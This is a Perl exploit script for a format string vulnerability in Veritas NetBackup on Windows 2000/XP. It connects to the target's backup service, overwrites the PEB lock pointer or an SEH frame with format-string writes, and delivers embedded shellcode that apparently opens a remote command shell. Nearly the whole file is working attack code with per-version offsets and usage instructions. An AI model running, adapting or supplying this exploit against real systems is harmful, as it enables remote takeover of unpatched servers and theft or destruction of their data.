#!C:\Perl\bin\perl.exe -w # # Vertias Netbackup Win32 format string exploit # Code By: johnh[at]digitalmunition[dot]com & kf[at]digitalmunition[dot]com # # For win2k/xp pre sp2 we overwrote PEBFastlock -> rtlentercritical # For win xp sp2 we overwrote SEH # http://www.digitalmunition.com/ # # You may have to run this 2 times. # # This exploit May NOT be posted to a public Archive like k-otik without being # in its original GPG form (protected by passphrase) use IO::Socket; use Getopt::Std; getopts('h:p:t:', \ our %args); if (defined($args{'h'})) { $host = $args{'h'}; } if (defined($args{'p'})) { $port = $args{'p'}; }else{$port = 13722;} if (defined($args{'t'})) { $target = $args{'t'}; } print "\n-=[Remote Veritas NetBackup Format String exploit]=-\n\n"; print "\n-=[TagTeam johnh[at]digitalmunition[dot]com and kf_lists[at]digitalmunition[dot]com]=-\n\n"; if(!defined($host)){ print "Usage: -h -p port -t target: 0 - Windows 2k/Windows XP SP0/SP1 - PEB 1 - Windows XP SP2 - SEH\n\n"; exit(1); } my $sock = new IO::Socket::INET(PeerAddr => $host,PeerPort => $port,Proto => 'tcp'); $sock or die "no socket :$!"; # 970 chars in length. my $shellcode = "\x90"x100; $shellcode .= "\xeb\x42" . "\x56". "\x57". "\x8b\x45\x3c". "\x8b\x54\x05\x78". "\x01\xea" . "\x52" . "\x8b\x52\x20". "\x01\xea". "\x31\xc0". "\x31\xc9". "\x41" . "\x8b\x34\x8a". "\x01\xee". "\x31\xff". "\xc1\xcf\x13" . "\xac" . "\x01\xc7". "\x85\xc0". "\x75\xf6". "\x39\xdf". "\x75\xea". "\x5a" . "\x8b\x5a\x24" . "\x01\xeb" . "\x66\x8b\x0c\x4b". "\x8b\x5a\x1c" . "\x01\xeb" . "\x8b\x04\x8b" . "\x01\xe8" . "\x5f" . "\x5e" . "\xc3" . "\xfc" . "\x31\xc0". "\x64\x8b\x40\x30". "\x8d\x78\x20" . "\x8b\x40\x0c" . "\x8b\x70\x1c" . "\xad" . "\x8b\x68\x08". "\x89\xee". "\x31\xc0". "\x64\x8b\x40\x30". "\x8b\x40\x0c" . "\x8b\x40\x1c" . "\x8b\x68\x08" . "\xbb\x6f\x5b\x8b\x9c". "\xe8\x8f\xff\xff\xff". "\xab" . "\xbb\xe1\x0f\xfe\xb7". "\xe8\x84\xff\xff\xff". "\xab" . "\x89\xf5". "\x31\xc0". "\x66\xb8\x6c\x6c". "\x50" . "\x68\x33\x32\x2e\x64". "\x68\x77\x73\x32\x5f". "\x54" . "\xbb\x71\xa7\xe8\xfe" . "\xe8\x65\xff\xff\xff" . "\xff\xd0" . "\x89\xef" . "\x89\xc5" . "\x81\xc4\x70\xfe\xff\xff" . "\x54" . "\x31\xc0". "\xfe\xc4". "\x40" . "\x50" . "\xbb\x22\x7d\xab\x7d". "\xe8\x48\xff\xff\xff". "\xff\xd0" . "\x31\xc0" . "\x50" . "\x50" . "\x50" . "\x50" . "\x40" . "\x50" . "\x40" . "\x50" . "\xbb\xa6\x55\x34\x79". "\xe8\x32\xff\xff\xff". "\xff\xd0" . "\x89\xc6" . "\x31\xc0" . "\x50" . "\x50" . "\x35\x02\x01\x70\xcc". "\xfe\xcc" . "\x50" . "\x89\xe0". "\x50" . "\x6a\x10" . "\x50" . "\x56" . "\xbb\x81\xb4\x2c\xbe" . "\xe8\x11\xff\xff\xff" . "\xff\xd0" . "\x31\xc0" . "\x50" . "\x56" . "\xbb\xd3\xfa\x58\x9b" . "\xe8\x01\xff\xff\xff" . "\xff\xd0" . "\x58" . "\x60" . "\x6a\x10". "\x54" . "\x50" . "\x56" . "\xbb\x47\xf3\x56\xc6". "\xe8\xee\xfe\xff\xff". "\xff\xd0" . "\x89\xc6" . "\x31\xdb" . "\x53" . "\x68\x2e\x63\x6d\x64". "\x89\xe1" . "\x41" . "\x31\xdb". "\x56" . "\x56" . "\x56" . "\x53" . "\x53" . "\x31\xc0". "\xfe\xc4". "\x40" . "\x50" . "\x53" . "\x53" . "\x53" . "\x53" . "\x53" . "\x53" . "\x53" . "\x53" . "\x53" . "\x53" . "\x6a\x44". "\x89\xe0". "\x53" . "\x53" . "\x53" . "\x53" . "\x54" . "\x50" . "\x53" . "\x53" . "\x53" . "\x43" . "\x53" . "\x4b" . "\x53" . "\x53" . "\x51" . "\x53" . "\x87\xfd" . "\xbb\x21\xd0\x05\xd0". "\xe8\xa8\xfe\xff\xff". "\xff\xd0" . "\x5b" . "\x31\xc0". "\x48" . "\x50" . "\x53" . "\xbb\x43\xcb\x8d\x5f". "\xe8\x96\xfe\xff\xff". "\xff\xd0" . "\x56" . "\x87\xef". "\xbb\x12\x6b\x6d\xd0". "\xe8\x87\xfe\xff\xff". "\xff\xd0" . "\x83\xc4\x5c" . "\x61" . "\xeb\x81"; #/* #7FFDF250 54 PUSH ESP #7FFDF251 5F POP EDI #7FFDF252 B8 90909090 MOV EAX,90909090 #7FFDF257 FD STD #7FFDF258 F2:AF REPNE SCAS DWORD PTR ES:[EDI] #7FFDF25A 57 PUSH EDI #7FFDF25B C3 RETN # #and # #over write FastPebLockRoutine pointer to EnterCriticalSection with our code address of 7FFDF250 # #7FFDF020 7FFDF250 # #*/ print "TARGET IS $target\n"; if ($target == 0) { $c = 8; @fmt_array = ( #WINDOWS 2K SP4/XP SP0-SP1 #OVERWRITE PEB FASTLOCKPOINTER -> RTLEnterCriticalSection [ 0x7FFDF250, 0x7FFDF252, 0x7FFDF254, 0x7FFDF256, 0x7FFDF258, 0x7FFDF25A, 0x7FFDF022, 0x7FFDF020 ], [ 0x5f54, 0x90b8, 0x9090, 0xfc90, 0xaff2, 0xc357, 0x7ffd, 0xf250 ], ); } if ($target == 1) { $c = 10; @fmt_array = ( #windows XP SP2 #OVERWRITE STATIC SEH FRAME [ 0x7FFDF250, 0x7FFDF252, 0x7FFDF254, 0x7FFDF256, 0x7FFDF258, 0x7FFDF25A, 0x0012ffb0, 0x0012ffb2, 0x0012ffb6, 0x0012ffb4 ], [ 0x5f54, 0x90b8, 0x9090, 0xfc90, 0xaff2, 0xc357, 0x9090,0x9090,0x7FFD, 0xF250 ], ); } my $offset = 0; my $dump_fmt=6; #amount of %.8x needed to reach stackbase my $payload; my $payload2; my $hi; my $lo; my $last = 0; my $flag = 2; my @shift; for (my $y = 0; $y < $c; $y = $y + 2) { $payload = "%08x" x $dump_fmt; $payload2 = pack('l', $fmt_array[0][$y]) . "AAAA" . pack('l', $fmt_array[0][$y+1]); $hi = $fmt_array[1][$y] - 0x2a - 35; $lo = $fmt_array[1][$y+1] - $hi - 77; $payload .= "%$hi" . "x%hn%$lo" . "x%hn"; print $sock " 118 1\nSNO space filler\n"; print scalar <$sock>; print scalar <$sock>; print $sock " 101 6\n" . "$payload" . "\n" . # You must finish the line off with a line feed. "dummy space\n" . "$shellcode\n" . "$payload2" . "\n" . "spare bits\n" . "spare bits\n\n"; print scalar <$sock>; print scalar <$sock>; } if ($target == 1) { #create exception so SEH is called print $sock " 118 1\nSNO space filler\n"; print scalar <$sock>; print scalar <$sock>; print $sock " 101 6\n" . "%n" . "\n" . # You must finish the line off with a line feed. "dummy space\n" . "$shellcode\n" . "AAAAAAAAAAAA" . "\n" . "spare bits\n" . "spare bits\n\n"; print scalar <$sock>; print scalar <$sock>; } close $sock;